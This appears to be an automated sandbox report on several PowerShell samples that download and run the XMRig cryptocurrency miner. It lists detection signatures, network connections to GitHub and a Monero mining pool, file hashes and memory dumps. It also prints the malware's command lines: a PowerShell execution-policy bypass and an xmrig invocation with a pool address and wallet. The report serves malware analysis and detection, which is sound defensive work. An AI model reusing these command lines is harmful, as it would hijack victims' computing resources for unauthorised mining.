| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4896 wrote to memory of 2008 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4896 wrote to memory of 2008 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/4896-0-0x00007FFF60233000-0x00007FFF60235000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kt10jmoh.anc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4896-9-0x0000017672F70000-0x0000017672F92000-memory.dmp
memory/4896-10-0x00007FFF60230000-0x00007FFF60CF2000-memory.dmp
memory/4896-11-0x00007FFF60230000-0x00007FFF60CF2000-memory.dmp
memory/4896-12-0x00007FFF60230000-0x00007FFF60CF2000-memory.dmp
memory/4896-14-0x0000017673110000-0x0000017673122000-memory.dmp
memory/4896-15-0x0000017673100000-0x000001767310A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2008-46-0x00000229282D0000-0x00000229282F0000-memory.dmp
memory/2008-47-0x0000022928320000-0x0000022928340000-memory.dmp
memory/2008-48-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-49-0x0000022929B00000-0x0000022929B20000-memory.dmp
memory/2008-50-0x0000022929B20000-0x0000022929B40000-memory.dmp
memory/4896-52-0x00007FFF60230000-0x00007FFF60CF2000-memory.dmp
memory/2008-51-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/4896-53-0x00007FFF60233000-0x00007FFF60235000-memory.dmp
memory/2008-54-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-55-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-57-0x0000022929B20000-0x0000022929B40000-memory.dmp
memory/2008-56-0x0000022929B00000-0x0000022929B20000-memory.dmp
memory/2008-58-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-59-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-60-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-61-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-62-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-63-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-64-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-65-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-66-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-67-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-68-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-69-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-70-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-71-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-72-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-73-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-74-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-75-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-76-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-77-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-78-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-79-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-80-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-81-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-82-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-83-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-84-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-85-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-86-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-87-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-88-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-89-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-90-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-91-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-92-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-93-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-94-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-95-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-96-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-97-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-98-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-99-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-100-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-101-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-102-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-103-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-104-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-105-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-106-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-107-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-108-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-109-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-110-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-111-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-112-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-113-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-114-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-115-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
memory/2008-116-0x00007FF728280000-0x00007FF728EB3000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:16
Platform
win10v2004-20240508-en
Max time kernel
1800s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4492 wrote to memory of 2500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4492 wrote to memory of 2500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
memory/4492-0-0x00007FFDEBC23000-0x00007FFDEBC25000-memory.dmp
memory/4492-10-0x000001D128B20000-0x000001D128B42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_slugk1da.vyx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4492-11-0x00007FFDEBC20000-0x00007FFDEC6E1000-memory.dmp
memory/4492-12-0x00007FFDEBC20000-0x00007FFDEC6E1000-memory.dmp
memory/4492-14-0x00007FFDEBC20000-0x00007FFDEC6E1000-memory.dmp
memory/4492-15-0x000001D128FF0000-0x000001D129002000-memory.dmp
memory/4492-16-0x000001D128B00000-0x000001D128B0A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2500-47-0x0000016254E80000-0x0000016254EA0000-memory.dmp
memory/2500-48-0x00000162550E0000-0x0000016255100000-memory.dmp
memory/2500-49-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-50-0x00000162E8E10000-0x00000162E8E30000-memory.dmp
memory/2500-52-0x00000162E9040000-0x00000162E9060000-memory.dmp
memory/4492-51-0x00007FFDEBC23000-0x00007FFDEBC25000-memory.dmp
memory/2500-53-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/4492-54-0x00007FFDEBC20000-0x00007FFDEC6E1000-memory.dmp
memory/2500-55-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/4492-56-0x00007FFDEBC20000-0x00007FFDEC6E1000-memory.dmp
memory/2500-58-0x00000162E8E10000-0x00000162E8E30000-memory.dmp
memory/2500-57-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-59-0x00000162E9040000-0x00000162E9060000-memory.dmp
memory/2500-60-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-61-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-62-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-63-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-64-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-65-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-66-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-67-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-68-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-69-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-70-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-71-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-72-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-73-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-74-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-75-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-76-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-77-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-78-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-79-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-80-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-81-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-82-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-83-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-84-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-85-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-86-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-87-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-88-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-89-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-90-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-91-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-92-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-93-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-94-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-95-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-96-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-97-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-98-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-99-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-100-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-101-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-102-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-103-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-104-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-105-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-106-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-107-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-108-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-109-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-110-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-111-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-112-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-113-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-114-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-115-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-116-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-117-0x00007FF722740000-0x00007FF723373000-memory.dmp
memory/2500-118-0x00007FF722740000-0x00007FF723373000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:23
Platform
win11-20240508-en
Max time kernel
1798s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5076 wrote to memory of 3028 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5076 wrote to memory of 3028 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
